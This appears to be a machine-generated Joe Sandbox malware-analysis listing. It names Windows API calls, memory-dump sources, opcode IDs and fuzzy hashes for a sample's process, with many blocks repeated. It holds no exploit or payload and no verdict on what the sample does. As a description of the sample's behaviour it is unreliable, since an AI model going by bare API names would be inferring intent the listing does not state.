                                                                                                                                                                    • Part of subcall function 0020889E: __getptd_noexit.LIBCMT ref: 0020889E
                                                                                                                                                                  • __lock_file.LIBCMT ref: 002042B9
                                                                                                                                                                    • Part of subcall function 00205A9F: __lock.LIBCMT ref: 00205AC2
                                                                                                                                                                  • __fclose_nolock.LIBCMT ref: 002042C4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2800547568-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • timeGetTime.WINMM ref: 001FF57A
                                                                                                                                                                    • Part of subcall function 001EE1F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001EE279
                                                                                                                                                                  • Sleep.KERNEL32(00000000), ref: 002575D3
                                                                                                                                                                  Memory Dump Source
• Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
• Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessagePeekSleepTimetime
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1792118007-0
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E84A6: __swprintf.LIBCMT ref: 001E84E5
                                                                                                                                                                    • Part of subcall function 001E84A6: __itow.LIBCMT ref: 001E8519
                                                                                                                                                                  • __wcsnicmp.LIBCMT ref: 001E83C4
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __itow__swprintf__wcsnicmp
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 712828618-0
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memmove
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4104443479-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000,?,?,00000000), ref: 001E4F8F
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FilePointer
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 973152223-0
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: select
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1274211008-0
                                                                                                                                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                  • Instruction ID: efea2e95d0fe48bd637f89fbe6bdaa4b6a6546ab11c6121979b06795f84d13b7
                                                                                                                                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                  • Instruction Fuzzy Hash: E2310870A0010AEBC708DF58C480A79F7A1FF49304B6582A9E549DB255D7B0EDC2CBD0
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClearVariant
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1473721057-0
                                                                                                                                                                  • Opcode ID: a89ee695fc463ffbc1fce1673ed96a606c66e36ab596baa3a94d084e7113277b
                                                                                                                                                                  • Instruction ID: 6e2383245a51bf944d3f077098d7d199f9c4197b94a2a89bf3b269a13a730a73
                                                                                                                                                                  • Opcode Fuzzy Hash: a89ee695fc463ffbc1fce1673ed96a606c66e36ab596baa3a94d084e7113277b
                                                                                                                                                                  • Instruction Fuzzy Hash: 4E415B74504655CFEB25CF18C484B2ABBE1BF49308F19859CEA994B362D372F885CF52
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memmove
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4104443479-0
                                                                                                                                                                  • Opcode ID: 5ecc60a58904954efebabeddea8edf0ccbcadbe408713a49cdb539ef408fe5d0
                                                                                                                                                                  • Instruction ID: 5bb753cc42b3e2175cecb6d59160006801da0ba29f558e3e2f1a79456c6d07e5
                                                                                                                                                                  • Opcode Fuzzy Hash: 5ecc60a58904954efebabeddea8edf0ccbcadbe408713a49cdb539ef408fe5d0
                                                                                                                                                                  • Instruction Fuzzy Hash: BE210871620A09EBDB144F51EC4576EBBB8FF25355F21842EE846D50D0EB7085E8C718
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memmove
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4104443479-0
                                                                                                                                                                  • Opcode ID: d4c578b8e5dc244d15faadf04d9ca27e9e4ce8d93c221026b454baae527076e6
                                                                                                                                                                  • Instruction ID: e6d5f592657bfed1eaadd8713c17650ca35cce0b574bcc13e2cb34c371b59849
                                                                                                                                                                  • Opcode Fuzzy Hash: d4c578b8e5dc244d15faadf04d9ca27e9e4ce8d93c221026b454baae527076e6
                                                                                                                                                                  • Instruction Fuzzy Hash: C621F670A10B04EBDB14AF51EC4876DFBF8FB19345F22841AE88AD5010D73095E4C759
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memmove
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4104443479-0
                                                                                                                                                                  • Opcode ID: 850a3e34ffcf0575de9322bf5b98585c373294fd89485bbbcd9ce223ec0d444b
                                                                                                                                                                  • Instruction ID: d53957be21535814bd986a69c237fd5743981047d9dbf0d16543b2f395fe205f
                                                                                                                                                                  • Opcode Fuzzy Hash: 850a3e34ffcf0575de9322bf5b98585c373294fd89485bbbcd9ce223ec0d444b
                                                                                                                                                                  • Instruction Fuzzy Hash: AD113A75600605DFD724DF29E481A1AB7F9FF48314B20842EE88ECB661E732E841CB50
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E3F5D: FreeLibrary.KERNEL32(00000000,?), ref: 001E3F90
                                                                                                                                                                    • Part of subcall function 00204129: __wfsopen.LIBCMT ref: 00204134
                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,001E34E2,?,00000001), ref: 001E3FCD
                                                                                                                                                                    • Part of subcall function 001E3E78: FreeLibrary.KERNEL32(00000000), ref: 001E3EAB
                                                                                                                                                                    • Part of subcall function 001E4010: _memmove.LIBCMT ref: 001E405A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1396898556-0
                                                                                                                                                                  • Opcode ID: 8e904789ca58a75cfe3a88bb1537bfd76afe779e219d7d8e32a11d36d509395a
                                                                                                                                                                  • Instruction ID: ec183a7b8c69de2736e49a849bc34ee21cee5a7213e51f761a83d7c5eb351a1b
                                                                                                                                                                  • Opcode Fuzzy Hash: 8e904789ca58a75cfe3a88bb1537bfd76afe779e219d7d8e32a11d36d509395a
                                                                                                                                                                  • Instruction Fuzzy Hash: B6112331610A55BBCF14BF65DC1AB9D76A59F60700F208828F942E70C1DB70AF149B50
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClearVariant
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1473721057-0
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
• Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
• Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memmove
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4104443479-0
                                                                                                                                                                  APIs
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,00000000,00000000,?,001E4E69,00000000,00010000,00000000,00000000,00000000,00000000), ref: 001E4CF7
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileRead
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                                                  APIs
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memmove
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4104443479-0
                                                                                                                                                                  APIs
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memmove
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4104443479-0
                                                                                                                                                                  APIs
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memmove
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4104443479-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • WSAStartup.WS2_32(00000202,?), ref: 002395C9
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Startup
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 724789610-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,001E34E2,?,00000001), ref: 001E3E6D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00227A11
                                                                                                                                                                    • Part of subcall function 001E7E53: _memmove.LIBCMT ref: 001E7EB9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FolderPath_memmove
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3334745507-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 001E1952
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSendTimeout
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1599653421-0
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 001E1952
                                                                                                                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0021E3AA
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$Timeout
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1777923405-0
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: TextWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 530164218-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,002549DA,?,?,00000000), ref: 001E4FC4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FilePointer
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 973152223-0
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClearVariant
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1473721057-0
                                                                                                                                                                  APIs
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __wfsopen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 197181222-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,001E50BE,?,001E5088,?,001EBE3D,002A22E8,?,00000000,?,001E3E2E,?,00000000,?), ref: 001E510C
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2962429428-0
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 001FAF8E
                                                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?,?), ref: 0024F64E
                                                                                                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0024F6AD
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0024F6EA
                                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0024F711
                                                                                                                                                                  • SendMessageW.USER32 ref: 0024F737
                                                                                                                                                                  • _wcsncpy.LIBCMT ref: 0024F7A3
                                                                                                                                                                  • GetKeyState.USER32(00000011), ref: 0024F7C4
                                                                                                                                                                  • GetKeyState.USER32(00000009), ref: 0024F7D1
                                                                                                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0024F7E7
                                                                                                                                                                  • GetKeyState.USER32(00000010), ref: 0024F7F1
                                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0024F820
                                                                                                                                                                  • SendMessageW.USER32 ref: 0024F843
                                                                                                                                                                  • SendMessageW.USER32(?,00001030,?,0024DE69), ref: 0024F940
                                                                                                                                                                  • SetCapture.USER32(?), ref: 0024F970
                                                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 0024F9D4
                                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0024F9FA
                                                                                                                                                                  • ReleaseCapture.USER32 ref: 0024FA05
                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 0024FA3A
